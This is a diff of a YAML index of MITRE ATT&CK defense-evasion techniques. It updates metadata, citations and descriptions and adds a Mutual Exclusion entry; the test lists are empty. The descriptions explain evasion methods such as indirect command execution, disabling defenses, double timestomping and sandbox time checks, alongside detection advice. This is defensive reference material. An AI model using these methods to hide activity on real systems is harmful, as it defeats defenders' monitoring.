+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests: []
   T1070.007:
@@ -3131,7 +3192,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1600.001:
     technique:
@@ -3157,7 +3217,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:36:22.369Z'
       name: Reduce Key Space
       description: |-
         Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
@@ -3180,8 +3240,6 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070.003:
     technique:
@@ -3277,65 +3335,75 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.003
     atomic_tests: []
   T1202:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-10-03T14:47:17.154Z'
+      name: Indirect Command Execution
+      description: |-
+        Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)
+
+        Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
       x_mitre_contributors:
       - Matthew Demaske, Adaptforward
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      - Liran Ravich, CardinalOps
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
+        such as Sysmon, for events such as process creations that include or are resulting
+        from parameters associated with invoking programs/commands/files and/or spawning
+        child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.2'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'Process: Process Creation'
+      x_mitre_defense_bypassed:
+      - Static File Analysis
+      - Application Control
       type: attack-pattern
       id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
       created: '2018-04-18T17:59:24.739Z'
-      x_mitre_version: '1.1'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1202
         url: https://attack.mitre.org/techniques/T1202
+        external_id: T1202
+      - source_name: Bleeping Computer - Scriptrunner.exe
+        description: Bill Toulas. (2023, January 4). Hackers abuse Windows error reporting
+          tool to deploy malware. Retrieved July 8, 2024.
+        url: https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/
       - source_name: Evi1cg Forfiles Nov 2017
-        url: https://twitter.com/Evi1cg/status/935027922397573120
         description: Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved
-          January 22, 2018.
+          September 12, 2024.
+        url: https://x.com/Evi1cg/status/935027922397573120
       - source_name: RSA Forfiles Aug 2017
-        url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
         description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe
           (if you are watching for cmd.exe). Retrieved January 22, 2018.
+        url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
+      - source_name: Secure Team - Scriptrunner.exe
+        description: Secure Team - Information Assurance. (2023, January 8). Windows
+          Error Reporting Tool Abused to Load Malware. Retrieved July 8, 2024.
+        url: https://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/
+      - source_name: SS64
+        description: SS64. (n.d.). ScriptRunner.exe. Retrieved July 8, 2024.
+        url: https://ss64.com/nt/scriptrunner.html
       - source_name: VectorSec ForFiles Aug 2017
-        url: https://twitter.com/vector_sec/status/896049052642533376
         description: vector_sec. (2017, August 11). Defenders watching launches of
-          cmd? What about forfiles?. Retrieved January 22, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
-
-        Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Indirect Command Execution
-      x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
-        such as Sysmon, for events such as process creations that include or are resulting
-        from parameters associated with invoking programs/commands/files and/or spawning
-        child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'Process: Process Creation'
-      x_mitre_defense_bypassed:
-      - Static File Analysis
-      - Application Control
-      x_mitre_attack_spec_version: 2.1.0
+          cmd? What about forfiles?. Retrieved September 12, 2024.
+        url: https://x.com/vector_sec/status/896049052642533376
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1202
     atomic_tests: []
   T1140:
@@ -3402,22 +3470,24 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1140
     atomic_tests: []
   T1562:
     technique:
-      modified: '2023-10-20T16:43:53.391Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Impair Defenses
-      description: |-
+      description: |+
         Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
 
-        Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)
+        Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
 
-        Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Jamie Williams (U ω U), PANW Unit 42
+      - Liran Ravich, CardinalOps
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools.  Lack of log events may be suspicious.
@@ -3426,15 +3496,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Office 365
       - IaaS
       - Linux
       - macOS
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Cloud Service: Cloud Service Disable'
@@ -3472,15 +3544,17 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1562
         external_id: T1562
+      - source_name: Google Cloud Mandiant UNC3886 2024
+        description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+          Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+          Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+        url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
       - source_name: Emotet shutdown
         description: The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK
           File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.
         url: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562
     atomic_tests: []
   T1055.003:
@@ -3504,7 +3578,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:22:50.800Z'
       name: Thread Execution Hijacking
       description: "Adversaries may inject malicious code into hijacked processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -3552,13 +3626,11 @@ defense-evasion:
       - Anti-virus
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.003
     atomic_tests: []
   T1036:
     technique:
-      modified: '2024-03-08T17:00:59.133Z'
+      modified: '2024-10-16T20:10:38.450Z'
       name: Masquerading
       description: |-
         Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
@@ -3574,7 +3646,7 @@ defense-evasion:
       - Felipe Espósito, @Pr0teus
       - Elastic
       - Bartosz Jerzman
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
@@ -3599,6 +3671,7 @@ defense-evasion:
       - 'Process: Process Creation'
       - 'Image: Image Metadata'
       - 'Scheduled Job: Scheduled Job Metadata'
+      - 'User Account: User Account Creation'
       - 'File: File Metadata'
       - 'Scheduled Job: Scheduled Job Modification'
       - 'Command: Command Execution'
@@ -3616,8 +3689,8 @@ defense-evasion:
         external_id: T1036
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Elastic Masquerade Ball
         description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
           Retrieved October 31, 2016.'
@@ -3630,12 +3703,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036
     atomic_tests: []
   T1070.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:43:56.839Z'
       name: 'Email Collection: Mailbox Manipulation'
       description: "Adversaries may modify mail and mail application data to remove
         evidence of their activity. Email applications allow users and other programs
@@ -3672,9 +3744,8 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'File: File Deletion'
@@ -3712,14 +3783,13 @@ defense-evasion:
         url: https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.008
     atomic_tests: []
   T1055:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:45.488Z'
       name: Process Injection
       description: "Adversaries may inject code into processes in order to evade process-based
         defenses as well as possibly elevate privileges. Process injection is a method
@@ -3822,12 +3892,11 @@ defense-evasion:
         url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1055
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -3911,7 +3980,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218:
     technique:
@@ -3978,60 +4046,77 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218
     atomic_tests: []
   T1070.006:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Romain Dumont, ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
-      type: attack-pattern
-      created: '2020-01-31T12:42:44.103Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1070.006
-        url: https://attack.mitre.org/techniques/T1070/006
-      - url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
-        description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
-          of Anti-Forensics Techniques. Retrieved June 3, 2016.'
-        source_name: WindowsIR Anti-Forensic Techniques
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-30T15:14:56.021Z'
       name: 'Indicator Removal on Host: Timestomp'
       description: |-
-        Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
+        Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
+
+        Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
+
+        Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
+
+        Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
 
         Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Romain Dumont, ESET
+      - Mike Hartley @mikehartley10
+      x_mitre_deprecated: false
       x_mitre_detection: 'Forensic techniques exist to detect aspects of files that
         have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques)
         It may be possible to detect timestomping using file modification monitoring
         that collects information on file handle opens and can compare timestamp values.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
+      - 'Process: OS API Execution'
       - 'File: File Modification'
       - 'File: File Metadata'
+      - 'Command: Command Execution'
       x_mitre_defense_bypassed:
       - Host forensic analysis
-      x_mitre_permissions_required:
-      - root
-      - SYSTEM
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
+      created: '2020-01-31T12:42:44.103Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/006
+        external_id: T1070.006
+      - source_name: WindowsIR Anti-Forensic Techniques
+        description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
+          of Anti-Forensics Techniques. Retrieved June 3, 2016.'
+        url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
+      - source_name: Inversecos Timestomping 2022
+        description: 'Lina Lau. (2022, April 28). Defence Evasion Technique: Timestomping
+          Detection – NTFS Forensics. Retrieved September 30, 2024.'
+        url: https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html
+      - source_name: Magnet Forensics
+        description: Magnet Forensics. (2020, August 24). Expose Evidence of Timestomping
+          with the NTFS Timestamp Mismatch Artifact. Retrieved June 20, 2024.
+        url: https://www.magnetforensics.com/blog/expose-evidence-of-timestomping-with-the-ntfs-timestamp-mismatch-artifact-in-magnet-axiom-4-4/
+      - source_name: Double Timestomping
+        description: Matthew Dunwoody. (2022, April 28). I have seen double-timestomping
+          ITW, including by APT29. Stay sharp out there.. Retrieved June 20, 2024.
+        url: https://x.com/matthewdunwoody/status/1519846657646604289
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1070.006
     atomic_tests: []
   T1620:
@@ -4134,9 +4219,76 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1620
     atomic_tests: []
+  T1480.002:
+    technique:
+      modified: '2024-10-28T16:22:25.431Z'
+      name: Mutual Exclusion
+      description: |-
+        Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)
+
+        While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)
+
+        In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)
+
+        Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Manikantan Srinivasan, NEC Corporation India
+      - Pooja Natarajan, NEC Corporation India
+      - Nagahama Hiroki – NEC Corporation Japan
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: OS API Execution'
+      - 'File: File Creation'
+      type: attack-pattern
+      id: attack-pattern--49fca0d2-685d-41eb-8bd4-05451cc3a742
+      created: '2024-09-19T14:00:03.401Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1480/002
+        external_id: T1480.002
+      - source_name: Intezer RedXOR 2021
+        description: Joakim Kennedy and Avigayil Mechtinger. (2021, March 10). New
+          Linux Backdoor RedXOR Likely Operated by Chinese Nation-State Actor. Retrieved
+          September 19, 2024.
+        url: https://intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/
+      - source_name: Sans Mutexes 2012
+        description: Lenny Zeltser. (2012, July 24). Looking at Mutex Objects for
+          Malware Discovery & Indicators of Compromise. Retrieved September 19, 2024.
+        url: https://www.sans.org/blog/looking-at-mutex-objects-for-malware-discovery-indicators-of-compromise/
+      - source_name: ICS Mutexes 2015
+        description: Lenny Zeltser. (2015, March 9). How Malware Generates Mutex Names
+          to Evade Detection. Retrieved September 19, 2024.
+        url: https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429/
+      - source_name: Microsoft Mutexes
+        description: Microsoft. (2022, March 11). Mutexes. Retrieved September 19,
+          2024.
+        url: https://learn.microsoft.com/en-us/dotnet/standard/threading/mutexes
+      - source_name: Deep Instinct BPFDoor 2023
+        description: Shaul Vilkomir-Preisman and Eliran Nissan. (2023, May 10). BPFDoor
+          Malware Evolves – Stealthy Sniffing Backdoor Ups Its Game. Retrieved September
+          19, 2024.
+        url: https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1564.011:
     technique:
       modified: '2023-11-06T20:14:51.609Z'
@@ -4200,57 +4352,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1497.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Jorge Orchilles, SCYTHE
-      - Ruben Dodge, @shotgunner101
-      - Jeff Felling, Red Canary
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
-      type: attack-pattern
-      created: '2020-03-06T21:11:11.225Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.003
-        url: https://attack.mitre.org/techniques/T1497/003
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Revil Independence Day
-        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
-        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
-          supply chain exploit to attack hundreds of businesses. Retrieved September
-          30, 2021.'
-      - source_name: Netskope Nitol
-        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
-        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
-          with evasive sandbox analysis technique. Retrieved September 30, 2021.
-      - source_name: Joe Sec Nymaim
-        url: https://www.joesecurity.org/blog/3660886847485093803
-        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
-          API hammering. Retrieved September 30, 2021.
-      - source_name: Joe Sec Trickbot
-        url: https://www.joesecurity.org/blog/498839998833561473
-        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
-          Retrieved September 30, 2021.
-      - source_name: ISACA Malware Tricks
-        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
-        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
-          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.048Z'
       name: Time Based Evasion
       description: |-
         Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
@@ -4265,6 +4370,12 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Jorge Orchilles, SCYTHE
+      - Ruben Dodge, @shotgunner101
+      - Jeff Felling, Red Canary
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'Time-based evasion will likely occur in the first steps
         of an operation but may also occur throughout as an adversary learns the environment.
         Data and events should not be viewed in isolation, but as part of a chain
